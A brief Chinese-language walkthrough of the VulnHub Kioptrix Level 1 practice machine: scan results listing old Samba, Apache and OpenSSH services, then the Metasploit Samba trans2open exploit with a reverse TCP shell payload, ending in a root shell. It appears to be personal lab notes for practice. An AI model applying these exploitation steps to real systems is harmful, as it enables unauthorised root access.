下载地址:https://download.vulnhub.com/kioptrix/Kioptrix_Level_1.rar
目标地址:192.168.243.37
攻击地址:192.168.18.148
目录
下载地址:https://download.vulnhub.com/kioptrix/Kioptrix_Level_1.rar
信息收集
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 2.9p2 (protocol 1.99)
80/tcp open http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
111/tcp open rpcbind 2 (RPC #100000)
139/tcp open netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp open ssl/https Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
1024/tcp open status 1 (RPC #100024)
MAC Address: 00:0C:29:32:B5:0E (VMware)
MSF
netbios-ssn Samba smbd (workgroup: MYGROUP) 漏洞
exploit/linux/samba/trans2open
set payload linux/x86/shell/reverse_tcp
建立连接
whoami
root